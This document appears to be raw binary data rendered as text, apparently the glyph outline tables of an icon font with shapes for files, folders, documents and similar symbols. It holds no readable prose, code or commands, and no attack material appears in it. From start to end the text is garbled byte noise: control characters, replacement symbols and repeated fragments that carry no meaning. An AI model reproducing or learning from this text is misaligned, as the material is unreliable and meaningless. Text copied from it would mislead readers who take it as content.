��@`!"3!265#"&=3;`��&%�%�& 
�`&� &% %��

�@`")-159=AE3#!"&5463!!"3!265#"&=;'35'35!5!5!5!5!5p�%� %&P��

�
�% 
v���������`��`��`��`�`�%&�& 
� 

 %��
��  `  �  `  `  `  `  	�@` $(,04;#!"&5463!3;!35'35!5!5!5!5!5`&�%� %&@ 
��������`��`��`��`�`�%��%&�&�
  `  �  `  `  `  `  
�@`")-159=AE3#!"&5463!!"3!265#"&=;'35'35!5!5!5!5!5p�%� %&P��

�
�% 
v���������`@����` ���`�%&�& 
� 

 %��
��  `  �  `  `  `  `  	�@`"&*.4;#!"&5463!35'35!5!5!5!5!5;`&�%� %&@�ࠠ����`@����` ���`
�`�%��%&�&�  `  �  `  `  `  `  ��
�@`+2%'7'#3#!"&5463!!"3!265#"&=;'h��h p�%� %&P��

�
�% 
v��h��hb`�%&�& 
� 

 %��
��@`!%37'7!"3!265#"&=3; h����&%�%�& 
��b��h��Z&� &% %��
�@`+2%#"&5463!;+7'7!"3!265'##"&=�

@%�
�h��hp��&%�%��v
 
�
�%��
@h��h��@&� &%@�0�
��@`!%#"&5463!;+7'7;�%&@&�%�h��h�
�&�&�%��%`h��h��`�
�@`'.33;#!"&546;77!"3!265'##"&=%3'`%�
� 

 ``p��&%�%��v
��@@@�%��

�
��``` &� &%@�0�
���@@�@`"3;#!"&546;7#73;`&�%� %& ``�@@�
�`�%��%&�&��``���@@3�
�@`*159=5##!3#!"&5463!!"3!265#"&=;'3#3#73#`���p�%� %&P��

�
�% 
v���``�``�``�`����%&�& 
� 

 %��
��� ���@` $;#!"&5463!3;357335`&�%� %&@ 
�� ` ` ``�%��%&�&�
������� `���@`")CRb3#!"&5463!!"3!265#"&=;'53326=33#535.5714632#"&57"326=4&#1p�%� %&P��

�
�% 
v�� /!!/ 7)@�@)7@0	
	
`�%&�& 
� 

 %��
��00!//!00*?A  A?*���	�		�	�@`,2AQ!"3!265#"&=53326=33#535.5;14632#"&57"326=4&#1`��&%�%�&� /!!/ 7)@�@)7�
���0	
	
`&� &% %���00!//!00*?A  A?*0�
���	�		�	�@`/BIM#5;##5353#5;#'#5;#3#!"&5463!!"3!265#"&=;'!���� �� ������ ����P�%� %&P��

�
�% 
v���` @@@`@@@@@@@�@@@��%&�& 
� 

 %��
���@��@`28<#373##5335#'#373#'#373#;#!"&5463!3;!�� �� �� �� �� �� �� ��@&�%� %&@ 
�� ` @@@`@@@�@@@�@@@��%��%&�&�
`�@��@`-@GTa.#"3265.#"326=3#!"&5463!!"3!265#"&=;'1"&5463271"&54632�
!//!!/��
!//!!/��%� %&P��

�
�% 
v�����/!!//!0@�/!!//!���%&�& 
� 

 %��
��P �@`06CP#"&546325%#"&54632!"3!265#"&=3;2654&#"3%2654&#"3��/!!//!
 /!!//!
`��&%�%�& 
��P�2�!//!!/�@��!//!!/P&� &% %��
� �@`")-159=AEIMQUY]3#!"&5463!!"3!265#"&=;'!!3535%35353535353535353535p�%� %&P��

�
�% 
v�����``����                   `�%&�& 
� 

 %��
�����@������  @  @  @  @    @  @  @  @  �@` $(,048<@DHL;#!"&5463!3;!3535%35353535353535353535`&�%� %&@ 
���������                   `�%��%&�&�
���` ������  @  @  @  @    @  @  @  @  �@`"),03#!"&5463!!"3!265#"&=;'
77'p�%� %&P��

�
�% 
v�� �� ��`�%&�& 
� 

 %��
��p���]]�@`;#!"&5463!3;%%7'`&�%� %&@ 
��@ ���`�%��%&�&�
��]�]]�@`#6=!!377#53#5'3#!"&5463!!"3!265#"&=;'�_@�� ]Fg*` {F��%� %&P��

�
�% 
v�e �dBn `)�AZ�%&�& 
� 

 %��
��@`,!"3!265#"&=3;!!377#53#5'`��&%�%�& 
���_@�� ]Fg*` {F`&� &% %��
��e �dBn `)�A�@`29F#5#"&54673#!"&5463!!"3!265#"&=;'2654&#"3�2HQ8<TJ6p�%� %&P��

�
�% 
v�pIggIIggI HR6JT<8Q�`�%&�& 
� 

 %��
��0gIIggIIg�@`"(#5#"&5467!"3!265#"&=3;��?[dEIg]C`��&%�%�& 
� �[_C]gIEd�`&� &% %��
	�@`")59=AEI3#!"&5463!!"3!265#"&=;'35335335!5%!5!5!5!5p�%� %&P��

�
�% 
v���     ���`��`��`��`�`�%&�& 
� 

 %��
�0@ �� @��  `  �  `  `  �@`$(,048;#!"&5463!353353357;!5%!5!5!5!5`&�%� %&@��     �
����`��`��`��`�`�%��%&�&`@ �� @`�
�  `  �  `  `  �@`")-393#!"&5463!!"3!265#"&=;'3'77'p�%� %&P��

�
�% 
v�`@ @�``II�``II`�%&�& 
� 

 %��
��P��``JJ``JJ�@`$(;#!"&5463!3;7'7'7''3`&�%� %&@ 
��`ii�`��iiJ@ @`�%��%&�&�
�jj����jj���`Adk#"3!2654&+.#".#"179:32+#!"&5463!'5#"&=!"3!26=#"&5467>329;'&&@&&,
7#.B�"7
 *8(`%� %&`� �%��

�
�(8$S9)�
v� %%%%%&B.k%4"(8@%&�&��%�
� 

@8(2
8M
��
���`<B:321#!"&5467>321#!"&5463!;.#";;�"7
 *8(��(8$S9&?%� %&@&�9 Aa%K5�
��%4"(88(2
8M#�� %&�&�%�R=<$5K�
�����"7J]d18181463463!###!"&54631"3!265!"&5897"3!2651!"&51%!"3!265#"&=;'�&&`�%%%� %%

�
�@%@

�
�@%���

�
�% 
v� %%�%%%&�& 
� 

&�@
� 

&�@
� 

 %��
������0BH463!;###!"&54634631"3!265!"&53!265!"&5"1%; &@&�%&&� %%%@

�
�@% 
�
�@%
�
�`%�%��%%%&�&&���
� 

&� 

&�
��
�����+2EL3265#"&=!"3%5463!+#!"&546;%;'!"3!265#"&=;'�
�%��
���`&`�%�%� %&��
v��

�
�% 
v�0�P
 %�
`��`&�%`%&�&p�
��
� 

 %��
������&,2%3265#"&=!"3##"&=!"3!26=;%;�%�&��&�� �&��&%�%
���
�`% %�&@��%�&� &%``�
@�
�@`!4;H%#"&546323#!"&5463!!"3!265#"&=;'2654&#"3*-<TT<<T�e�%� %&P��

�
�% 
v��.BB..BB.�T<<TT<.��%&�& 
� 

 %��
���B..BB..B�@`$*7%#"&54632!"3!265#"&=3;2654&#"3*-<TT<<T�u��&%�%�& 
���.BB..BB.�T<<TT<.�&� &% %��
��B..BB..B�@`")33#!"&5463!!"3!265#"&=;'7'373p�%� %&P��

�
�% 
v�p�0��00��0`�%&�& 
� 

 %��
���`�`��`��@`"!"3!265#"&=3;7'373`��&%�%�& 
��Ѐ0��00��0`&� &% %��
�``�`��`����`�'BIZ'!"3!;26=4&+54632354&'9!"&5463!;"&#""#"&=32+"&=463���&%`
�

�/!!/ $���

@%�.B
�v
0�
	�
	u+�&� & 

�
P!//!!7
��
�
�%��B.P
`�
��P	�		�	���`� C#"&=!"3!5467546325';'32+"&=46354632#54&#"3�&��&%@T<
�
���

�

B..B /!!/��%�&� &�	8<T�@
�@
�

�
P/AB.!//!P���`�8AHY%;26=4&#154&''!"3!5!"&5463!;"&#"1"754632#"&=32+"&=463@
�

$���&%`��

@%�.B
@/!!/�v
0�
	�
	  

�
0!7
K�&� & 
�
�%��B.0
`�0!//!0��
��P	�		�	���`� 8A#"&=!"3!546754632';'";26=4&#54&#"34632#�&��&%@T<
�
�� 

�

B..B /!!/��%�&� &�;U@
�p0
�

�
0.BB.!//!0���`� '*.2%'!"3!!'!"&5463!;'#"&=!73535���&%&�`����

@%�P�G�v
P��Ј   ��&� &@�B
�
�%�9���
�����``�  ���`�"%#"&5463!;';!73535��%&@&�pЀ
�p�`�    &�&�%�B���`�
�����``�  ���`�"=DQ%'7'77932654&''!"3!'!"&5463!;.#"9#"&=1"&54632�DDDDDDD�G)Ig5+���&%H��

@%�Ig
	-�v
p<TT<<TTyDDDDDDD#gI3Ts�&� & 
�
�%��gI(�
���T<<TT<<T���`�(.;%'7'77!"&5463!;.#"9;2654&#"3�DDDDDDD��%&@&�)+L8!?
�PIggIIggIyDDDDDDD&�&�%��!8L+9`�
�@gIIggIIg���`�18EL%932654&''!"3!'!"&5463!;.#"9#"&=1"&54632/77(G)Ig5+���&%H��

@%�Ig
	-�v
p<TT<<TTLK4d{ #gI3Ts�&� & 
�
�%��gI(�
���T<<TT<<T8L4d|���`�"/6%!"&5463!;.#"9;2654&#"3/77��%&@&�)+L8!?
�PIggIIggIK4d{ &�&�%��!8L+9`�
�@gIIggIIgXL4d|���`�"=DQ%533##5#5932654&''!"3!'!"&5463!;.#"9#"&=1"&54632� `` `G)Ig5+���&%H��

@%�Ig
	-�v
p<TT<<TT�`` `` �#gI3Ts�&� & 
�
�%��gI(�
���T<<TT<<T���`�(.;%533##5#5!"&5463!;.#"9;2654&#"3� `` `?��%&@&�)+L8!?
�PIggIIggI�`` `` �&�&�%��!8L+9`�
�@gIIggIIg���`�18EI%932654&''!"3!'!"&5463!;.#"9#"&=1"&54632'35(G)Ig5+���&%H��

@%�Ig
	-�v
p<TT<<TT�� #gI3Ts�&� & 
�
�%��gI(�
���T<<TT<<T�  ���`�"/3%!"&5463!;.#"9;1"&54632'35��%&@&�)+L8!?
�PIggIIgg�� &�&�%��!8L+9`�
�@gIIggIIg�  ���`�	*EL%#"&'7.54632932654&''!"3!'!"&5463!;.#"9#"&=!T<.��T<.�G)Ig5+���&%H��

@%�Ig
	-�v
�-<T��-<T�#gI3Ts�&� & 
�
�%��gI(�
����`�
28%#"&'7'.#"7!"&5463!;.#"9;9gI 8�:!Ig����%&@&�)+L8!?
��8 Ig�gI!:��&�&�%��!8L+9`�
���`�18EOS%932654&''!"3!'!"&5463!;.#"9#"&=1"&54632'3#35#5'35(G)Ig5+���&%H��

@%�Ig
	-�v
p<TT<<TTl  `    #gI3Ts�&� & 
�
�%��gI(�
���T<<TT<<T�    @@  ���`�"/9=%!"&5463!;.#"9;1"&54632'3#35#5'35��%&@&�)+L8!?
�PIggIIggy  `    &�&�%��!8L+9`�
�@gIIggIIg�    @@  @@*7DHR%1.546325!3!"&5463!!2#"&'1!54&#!'!"2654&#"3'353#35#5�	
gI��
��x&&`@�&+5gI)G�X`
�l?��
0<TT<<TT< @  ` �(Ig���
 %@%�%�T3Ig#�@
�
�� T<<TT<<T�  @    @@@ -7;%!"&5463!!2.#"9!51"&54632'3#35#5'35���&&`@�&)+L8!�_�PIggIIggy  `   �%@%�%�!8L+9�  �gIIggIIg�    @@  �@`")-159=AEIM3#!"&5463!!"3!265#"&=;'!5%3#7353#7353!53#7353!5p�%� %&P��

�
�% 
v���```  @``  `�```  ``�%&�& 
� 

 %��
���   `@  �`@    �`@    �@` $(,048<;#!"&5463!3;!5%353535353!535353!5`&�%� %&@ 
����``@ @`@ `�``@ ``�%��%&�&�
�   ``   �``     �``     �@`-@GT%#"&5463253#'##3#'/33#!"&5463!!"3!265#"&=;'2654&#"3�
!//!
  �\" ` ` """D��%� %&P��

�
�% 
v��/!!/�``�` ```�%&�& 
� 

 %��
��p�@`06C%#"&5463253#'##3#'/3!"3!265#"&=3;2654&#"3�
!//!
  �\" ` ` """D���&%�%�& 
���/!!/�``�` ```&� &% %��
� ����#3'!3;26=+"&=#!5%5!!�ٌ�F��%�% /!�!/��������@%&@ 0!//!0���������;26=3'!3!!!�%�%ٌ�F������@&%@�����` �@#.<3'!3;26=+"&=#!5!!;26=!!+"&=#!5�ٌ�F��%�% /!�!/�� ����%�%��@/!�!/��@��@%&@ 0!//!0���� ��� %& 0!//!0��` �@#!!!!+"&=#7!#+"&=��� �� �%�%ٌ���%�%@�� �0!//!0 ��@%&@`@�@$147>35#"&=!"3;26=+"&=#!5%57463!!5!3';'���%��
�%�% /!�!/��`&`�`��`9�99�
v�`�%�
�`@%&@ 0!//!0���&�f��� [[[U�
�`@�@#&)0+"&=#463!;#5'5'!"!#7#5#"&=�%�%�
@%��`���&` �@99�9��v
`@&%@�
�%�00�f�&����� [[[U�
�
`@�@
!-4?CGK3!53;265%!'5'!"7#75!463!;#"&=!+"&='!53535��� �/!�!/�� `���&``99`9��
@%���v
� �@��`���@��0!//!@�� �f�&���[[[[�
�%���
��000�    �  	`@�@%)-1<5'5'!"!#7#5463!;#"&=!535355!+"&5�`���&` �@99�9��
@%���v
����`��� %�%00�f�&����� [[[[�
�%���
���    �  ��  %%``� !/'7'#3#+"&=#735#!#3!53;265�h��h @���%�%ٌ��� ����� �/!�!/�h��h`��@&%@� ���  ���0!//!``� !'7'#3'#53!3#3;26=�h��h �ٌ��������%�%�h��h`�`� ���  �@%%@``�`!/'7'#73#+"&=#735#!#3!53;265�h��h @���%�%ٌ��� ����� �/!�!/ h��h����@&%@� ���  ���0!//!``�`!'7'#3'#53!3#3;26=�h��h �ٌ��������%�% h��h��@� ���  �@%%@ `� $!2#!"&5463!'!"3!2654&#!�&%��&&`,?��

 

�l�%�@%%@%��
��

�
 `� '!"3!2654&#!@��&& %&����%��%%�% `� )5463!!2!#!"&5%'!"3!2654&#!@
M?�
��`
��
�@��&& %&�� �
�
@ ��

`��%��%%�% `� 5463!!23!265! &`@�&�`& %�` �%�%@ ��%%` `7J5463!!2!#!"&55463!!2#1512654&#!'!"#'!"3!2654&#! 
M?�
��`
��
@&`@�&%

�l?��
 �@��&& %&���
�
@ ��

`@ %�%�@% 
�
�
 ��%��%%�% `,5463!!23!265!5463!!2#14&#!'&`@�&�`& %�``&`@�&%8(��@�%�%@ ��%%`@ %�%�@%�(8� `� 2!#!"&5!'7'%5463!!2%'!"3!2654&#!�
��
�h��h�@
M?�
�`@��&& %&����

`��h��h" �
�
@��%��%%�% `� !#!"&5!'7'%5463!!2�%��&�h��h� &`@�&��%%`��h��h" �%�%@ `� 1%!"&5!#!7'7%5463!!2%'!"3!2654&#!�
`
��h��h�`
M?�
�`@��&& %&���
`��
 h��h��
�
@��%��%%�% `� %!"&5!#!7'75463!!2�&�%��h��h�@&`@�&`%`��% h��h����%�%@@@=IZ%!"&5!"&#""754&#!'!"3!;26=4&+54632354&'9%5463!!232+"&=463�`
`.B
�&��@��&&�
�

�/!!/ $��
M?�
p�
	�
	�
`AA/P
ի%�%��% 

�
P!//!"6
k�
�
@��	�		�	@@A5463!!23!5467546325!32+"&=46354632#54&#"3&`@�&�`%�T<
�`� 

�

B..B /!!/�@�%�%@ ��%�9<T(�
�

�
P/AB.!//!P@@3<IZ%546315463235!3!"&5463!!212+"&=7354&#"%!54&#!'!"";26=4&+�
B.��
��`&&`@�&$

�
@�/!!/�`
�l?��
�	
�	
��`
0.Ba��
 %@%�%�
7!0
�

 �0!//!�@
�
���	�		�	@@6?5463!!23!5467546325!";26=4&#54&#"34632#&`@�&�`%�T<
�`

�

B..B /!!/�@�%�%@ ��%�9<T(�P
�

�
P.BB.!//!P `� #6C#"&54632!2#!"&5463!'!"3!2654&#!2654&#"3
-<TT<<T���&%��&&`,?��

 

�l<.BB..BB.?T<<TT<.�%�@%%@%��
��

�
��B..BB..B `� $1#"&54632'!"3!2654&#!2654&#"3
-<TT<<T��@��&& %&��P.BB..BB.?T<<TT<.��%��%%�%��B..BB..B  (+/3%!3!"&5463!!2!7!54&#!'!"!'3535��P��
F��&&`@�&`�`&��`
�l?��
�0�   ����
 %@%�%�b�@�@
�
���``�    %!"&5!'%5463!!2!73535`��&�p��&`@�&p�`�   `%`��`�%�%@����``�    6CP%'7'77'1.546325!3!"&5463!!2#"&'1!54&#!'!"2654&#"3PDDDDDDD�	
gI��
��x&&`@�&+5gI)G�X`
�l?��
0<TT<<TT<�DDDDDDD(Ig���
 %@%�%�T3Ig#�@
�
�� T<<TT<<T  +7%!"&5!.#"15463!!22654&#"7'7'77���&�)+L8!�_&`@�&PIggIIggIDDDDDDD`%`p!8L+9��%�%@�gIIggIIg�DDDDDDD  *7DK%1.546325!3!"&5463!!2#"&'1!54&#!'!"2654&#"3/77�	
gI��
��x&&`@�&+5gI)G�X`
�l?��
0<TT<<TT<K4d{�(Ig���
 %@%�%�T3Ig#�@
�
�� T<<TT<<T8L4d|  ,3%!"&5!.#"15463!!22654&#"3/77���&�)+L8!�_&`@�&PIggIIggIK4d{`%`p!8L+9��%�%@�gIIggIIgXL4d|  6CP%533##5#51.546325!3!"&5463!!2#"&'1!54&#!'!"2654&#"3@ `` `-	
gI��
��x&&`@�&+5gI)G�X`
�l?��
0<TT<<TT<�`` `` `(Ig���
 %@%�%�T3Ig#�@
�
�� T<<TT<<T  +8%#53533###!"&5!.#"15463!!22654&#"3@`` `` ���&�)+L8!�_&`@�&PIggIIggI� `` `%`p!8L+9��%�%@�gIIggIIg  *7DH%1.546325!3!"&5463!!2#"&'1!54&#!'!"2654&#"3'35�	
gI��
��x&&`@�&+5gI)G�X`
�l?��
0<TT<<TT<p�(Ig���
 %@%�%�T3Ig#�@
�
�� T<<TT<<T�    ,0%!"&5!.#"15463!!21"&54632'35���&�)+L8!�_&`@�&PIggIIgg��`%`p!8L+9��%�%@�gIIggIIg�    	$>K32654&'.#"'1.546325!3!"&5463!!2#"&'1!54&#!'!"��-<T%-<T,	
gI��
��x&&`@�&+5gI)G�X`
�l?��
*�T<.*T<.
(Ig���
 %@%�%�T3Ig#�@
�
�  
)5#"&'7'.#"7!"&5!.#"15463!!2�gI 8�:!Ig����&�)+L8!�_&`@�&?8 Ig�gI!:��%`p!8L+9��%�%@@`� -33#!"&5!75463!!2%'!"3!2654&#!3'5�
��
�``�`
M?�
�`@��&& %&��@�@@��

`��``@�
�
@��%��%%�%��@@�@`� !3#!"&5!7%5463!!275#�%��&``�@&`@�&��@@���%%`��``  �%�%@ �@@��@`Udkx5#535#535#535#535#535#535#5#"3!265#"&=#3#3#3#3#3#3##"&54679#!"&5463!';'"32654&#�             `

�
�%�            $/!!/%�%� %&`��
v��~"             
� 

 %�            B,!//!,��%&�&ఐ
��0�@`Y_l5#535#535#535#535#535#535#535#"3!265#"&=##3#3#3#3#3#3##"&54679;"32654&#�              �&%�%�&�             $/!!/%�
��p~"              &� &% %�             B,!//!,�
���@`Rcp32654&'535#535#535#535#535#535#532#!"&546;3#3#3#3#3#3#3"3!2654&#!12#"&546%/!!/$            �(88(��(88(�             �5KK5`5KK5����,!//!,B            8(��(88(`(8             �K5��5KK5`5K��@`Wd5#535#535#535#535#535#535#535#"3!2654&+#3#3#3#3#3#3##"&54679"32654&#              �5KK5`5KK5�             $/!!/%~"              K5��5KK5`5K             B,!//!,�pP 1#".54>32"'%2>54.#"3n"P,8cJ++Jc88cJ++%���2WA&&AW22WA&&AW22+Jc88cJ++Jc88c%��&AW22WA&&AW22WA&��` 3#".54>321"/'2>54.#"3n"P,8cJ++Jc88cJ+�

&
��+L8!!8L++L8!!8L+2+Jc88cJ++Jc8,P"�%


�!8L++L8!!8L++L8!�pp +@533##5#5#".54>327"/72>54.#"3� �� �E$]48cJ++Jc88cJ+% ���2WA&&AW22WA&&AW2 �� �� � %+Jc88cJ++Jc84]$��%&AW22WA&&AW22WA&��` *?533##5#5#".54>321"/'2>54.#"3� �� �."P,8cJ++Jc88cJ+�

&
��+L8!!8L++L8!!8L+ �� �� �+Jc88cJ++Jc8,P"�%


�!8L++L8!!8L++L8!�pp 48#".54>327"/72>54.#"3!5�$]48cJ++Jc88cJ+% ���2WA&&AW22WA&&AW2� E %+Jc88cJ++Jc84]$��%&AW22WA&&AW22WA&  ��` 37#".54>321"/'2>54.#"3'!5n"P,8cJ++Jc88cJ+�

&
��+L8!!8L++L8!!8L+� 2+Jc88cJ++Jc8,P"�%


�!8L++L8!!8L++L8!�  �@`+I_hy9.54632#"&5'326=>54&#"154>322#!"&54639;54632354.#"!54&#""3!2654&#!�	
 /!!/�&AW22WA&(88(� (88(  gIIg !8L++L8!@ T<<T`%%�%%� S		@@@!!//!!p2WA&&AW2p8(��(88(@(8pIggIpp+L8!!8L+pp<TT<�&��&&@&�@`2;1.54632#"&59"3!2654&#54.#"354632�	
�(88(�(88(&AW22WA&`T<<TS		P8(��(88(@(8p2WA&&AW2pp<TT<p ����+Vr�%9.54632#"&5'326=>54&#"1!2#!"&546354&#"#"&=4>32'4.#"3126=46323"3!2654&#!�	
 /!!/`�(88(� (88(T<<T&AW22WA& !8L++L8!
	gIIg @%%�%%� �S		@@@!!//!!8(��(88(@(8�<TT<��2WA&&AW2��+L8!!8L+�		�IggI� &��&&@& ����@%326=>54&#"14&#"#"&=4>32!2#!"&54635�
	�T<<T&AW22WA&�(88(� (88(�S		S�<TT<��2WA&&AW2�8(��(88(@(8����`�.Ndz�#"&=4&#"!2#!"&546354>32'4.#"3546323126=9.54632#"&5'326=>54&#"1'"3!2654&#!T<<T(88(� (88(&AW22WA& !8L++L8!gIIg
	�	
 /!!/�%%�%%� �`�<TT<�8(��(88(@(8�2WA&&AW2  +L8!!8L+��IggI�		��S		@@@!!//!!�&��&&@&���`�D%9.54632#"&554.#""3!2654&#!&4=4632326=	
&AW22WA&(88(�(88(��T<<T�S		  2WA&&AW2�8(��(88(@(8�<TT<t##T�``
9=AEIMcl7!54&#!"373!265!%5#54>322#!"&5463937#37#37#37#37#354632354.#"!54&#"�`%� %0H%�%��`0�(&AW22WA&(88(� (88(@0@0@0@0@0@0@0@0@0@�x gIIg !8L++L8!@ T<<T�&&� @@`%% @@�p2WA&&AW2p8(��(88(@(8��@@@@@@@@@@pIggIpp+L8!!8L+pp<TT<
�`` $9B%5##!"&5!%53373373373373373754&#54.#""54632`80h8(� (8��`h0 0@0 0@0 0@0 0@0 0@0�8(&AW22WA&(8�T<<T�@@ (88( @@@@@@@@@@@@`�(8p2WA&&AW2p8(� p<TT<p�``*Lbk�1.54632#"&5'326=>54&#"154>322+".=4639;54632354.#"!54&#"";2>=4&#!	
 /!!/�&AW22WA&(8(F]5�5]F(8(  gIIg !8L++L8!@ T<<T`%#=R.�/Q=#%� S		@@@!!//!!p2WA&&AW2p8(�5]F((F]5�(8pIggIpp+L8!!8L+pp<TT<�&�.R=##=R.�&�``6?1.54632#"&59";2>=4&#54.#"354632	
�(8(F]5�5]F(8(&AW22WA&`T<<TS		P8(�5]F((F]5�(8p2WA&&AW2pp<TT<p@���+Zv�%9.54632#"&5'326=>54&#"1!2+".=46354&#"#"&=4>32'4.#"3126=46323";2>=4&#!�	
 /!!/`�(8(F]5�5]F(8(T<<T&AW22WA& !8L++L8!
	gIIg @%#=R.�/Q=#%� �S		@@@!!//!!8(�5]F((F]5�(8�<TT<��2WA&&AW2��+L8!!8L+�		�IggI� &�.R=##=R.�&@���D%326=>54&#"14&#"#"&=4>32!2+".=4635�
	�T<<T&AW22WA&�(8(F]5�5]F(8(�S		S�<TT<��2WA&&AW2�8(�5]F((F]5�(8����`�2Rh~�#"&=4&#"!2+".=46354>32'4.#"3546323126=9.54632#"&5'326=>54&#"1'";2>=4&#!T<<T(8(F]5�5]F(8(&AW22WA& !8L++L8!gIIg
	�	
 /!!/�%#=R.�/Q=#%� �`�<TT<�8(�5]F((F]5�(8�2WA&&AW2  +L8!!8L+��IggI�		��S		@@@!!//!!�&�.R=##=R.�&���`�H%9.54632#"&554.#"";2>=4&#!&4=4632326=	
&AW22WA&(8(F]5�5]F(8(��T<<T�S		  2WA&&AW2�8(�5]F((F]5�(8�<TT<t##T�``<R[%5!5!5!5!5!5!4&#!"3!265!5!54>322#!"&54639;54632354.#"!54&#"@�� �� �� %� %%�%�� ��&AW22WA&(88(� (88(  gIIg !8L++L8!@ T<<T�@ @ @ %&��&% �p2WA&&AW2p8(��(88(@(8pIggIpp+L8!!8L+pp<TT<�``)2%!5!5!5!5!5!5!5!4&#54.#""3!26554632`��@��@��@��@8(&AW22WA&(88(�(8� T<<T` @ @ @ (8p2WA&&AW2p8(��(88(�p<TT<p �`#8CN[%#!"&=#"&546;5463!232#%5!32654&#!";"!54&#!3!26=!%2654&#"3 %� %@(88(@%�%@(88(�``@&&� &&@@
 
�  
�
�� 



` %% 8( (8�%%�8(��(8 ��% &%��&�
��
���

�



 �`
)65463!2!#"&5463!2+!3!265!%2654&#"3�%�%��  (88(�(88( �` %�%��@



`�%%��8( (88(��(8 �%%`



 ����#8CN[%32654&+54&#!"#";3!265%#"&5463!2+5!!2!5463!#!"&=%2654&#"3 @(88(@%� %@(88(@%�%��@&&�&&@��@�
��
  
� 
 



�8( (8�%%�8(��(8�%%�& %&��%``�
��
���

�



 ����
)65463!2!#"&5463!2+5!3!265!%2654&#"3�%�%��  (88(�(88( �` %�%��@



��%%��8( (88(��(8� �%%�



@�`#8CN[_c%#!"&=#"&546;5463!232#%5!32654&#!";"!54&#!3!26=!%2654&#"3!5!5@%� %@(88(@%�%@(88(�``@&&� &&@@
 
�  
�
�� 



�� �` %% 8( (8�%%�8(��(8 ��% &%��&�
��
���

�



�  `  @�`
)6:>5463!2!#"&5463!2+!!#!"&5%2654&#"3!5!5�%�%��  (88(�(88( �` `%� %@



�� �`�%%��8( (88(��(8 �%%`



�  `   ����#8CN[_c%32654&+54&#!"#";3!265%#"&5463!2+5!!2!5463!#!"&=%2654&#"3!5!5 @(88(@%� %@(88(@%�%��@&&�&&@��@�
��
  
� 
 



�� �8( (8�%%�8(��(8�%%�& %&��%``�
��
���

�



�  `   ����
)6:>5463!2!#"&5463!2+5!!#!"&5%2654&#"3!5!5�%�%��  (88(�(88( �` `%� %@



�� ���%%��8( (88(��(8� �%%�



�  `  
��`&*.26:>BFJN!#53!53#'#5#"&=!"#463!';'3#3#35#3#3#3#35#3#3#3`�`  �    �%��
 &`��
v�� ` ` ` ` ` ` ` ` ` @@�@@���%�
�`�&ఐ
���� ���� ��� ��� ��� 
��`!%)-159=AE!#53!53#%463!;;3#3#35#3#3#3#35#3#3#3`�`  �  ��&@&��
�  ` ` ` ` ` ` ` ` ` @@�@@���&�%��
���� ���� ��� ��� ���   �`1<IMQUY]aeimq%326=4&+54&#!"#";5!%"&=463!2#5!!2!54632654&#"33335333353353353333533#35@ (88(@%� %@(88( ��@%&�&%� ��
��




��             `   � �8(�(8�%%�8(�(8`` %�%%�&``@
��
�`



�������������
  �`
+/37;?CGKOS5463!2!#"&=463!2+5!%2654&#"33335333353353353333533#35�%�%��  (88(�(88( �``



��             `   � `�%%���8(�(88(�(8``



�������������
� ��'+/37CW^%#53326=#+#53#53#53#"&=3;%5#!53%5#!53%53#5!#53%#5#"&=!"#463!';'�@@  % 
 �@@`@@`@@` % 
  �� @ �� `  �`  � �%��
 &`��
v�   %  
       &  
`@@@@`@@@@�@�@@�@ �%�
�`�&ఐ
�
� ��#'+7COU%#5335##5335##"&=3;%5##5%5335%53#5!#53%5#"&=!"+5326=;`@@ @@�@@ @@� % 
    ��   `  �`  ��&��&`%  
�
�         &  
�@@ @@ @@ @@�@�@@�@ �%�&�`�� % 
 �
@�K%'7'##"&54671.54632>321+32654&'1.#".#"1;5�h��h  �5K9*pP?b.9R)7K5��B^8,`@'g?.R=#*6^B�Xh��hh�K5-F
	PpH8M7
E-5K ^B2P<P		3?#=R.O1B^ @�)-%!2654&'1.#".#"13!'7'5'35B^8,`@'g?.R=#*6^Bh��h  �^B2P<P		3?#=R.O1B^�h��h����@`� K'7'#'#"&54671.54632>321+32654&'1.#".#"1;5�h��h  �5K9*pP?b.9R)7K5��B^8,`@'g?.R=#*6^B��h��h���K5-F
	PpH8M7
E-5K ^B2P<P		3?#=R.O1B^ @`� )-!2654&'1.#".#"13!5'7'#35B^8,`@'g?.R=#*6^Bh��h  ^B2P<P		3?#=R.O1B^�h��h���@�� !EHLP#"&54671.54632>321+'32654&'1.#".#"1;!!73535l�5K9*pP?b.9R)7K5���yB^8,`@'g?.R=#*6^By9�И�Ј    K5-F
	PpH8M7
E-5K�� ^B2P<P		3?#=R.O1B^` ��``�  @�� "%)-32654&'1.#".#"1;!73535�QB^8,`@'g?.R=#*6^BQ��`�   ^B2P<P		3?#=R.O1B^@@���``�  @���@3!2654&'1.#".#"1%#!"&54671<54>32>329�*9K5 5K7)R9.b?Ppy,8^B��B^6*#=R.?g'@`�
F-5KK5-E
7M8HpP	P2B^^B1O.R=#?3		P<@���#!"&54671<54>32>32<,8^B��B^6*#=R.?g'@`�P2B^^B1O.R=#?3		P<`���#(-23'!3;26=+"&=#!5%5!!!'!!'!!'!�ٌ�F��%�% /!�!/���������*��L&&����@&%@ 0!//!0������  @  @  `���#;26=3'!3!!!!'!!'!!'!`%�%ٌ�F���������*��L&&��@&%@������  @  @  �``%#3'3#546;274&+"@��99r�
@
@`&@%���JJ@`

���&&�`�``%#'54&+"`��``�&@%�� ��@`&&`��3�	''7627'7>/&"��SijS7		&		7�Pe ��&4�-;��Si<S7

%

7��Oc� �5&�-��3�
764/.?'�7&47��� �jj���;75&8���� �j���`�`+BI	''76271'!"3!2657>/&"#!"&5463!;?#"&=N��SijS7		&		7�PeC���&%�%�&4s 
� 

@%��� ����v
;��Si<S7

%

7��Oct�&� &%@�5&s���

�
�%��� �а
�`�`/5'?64/&"7'%#!"&5463!;762;NS��Si7		&		7S�ePC%� %&@&��4&�
�;S��Si7

%

7S��cOt��%&�&�%�&5��

��� �#/CJNRVZ^k%9>54&#"!"&5463!;+593267'73265'!"3!75#"&=35'35!5!5!51"&54632�B..B�

@%�
@�

00�@%���&%PP@�v
��������`��`�p!//!!//�(.BB.("
�
�%��
"~00S%@�&� &�PP�0�
��  `  �  `  `  ��/!!//!!/	��� �#/59=AEIV%9>54&#"!"&5463!;+575#"&'1;!35'35!5!5!52654&#"3�B..B�%&@&�%@�00

@
��������`��`�p!//!!//!�(.BB.(B&�&�%��%B�00�5�
  `  �  `  `  ��/!!//!!/�`�!-CGKO\!2654&#!";5.54632975#"&'1#"&5463!2#!'5!5!5352654&#"3��

��

@B..B�00

 @&&�&&�`PP @�� ���0!//!!//!BB
�

�`
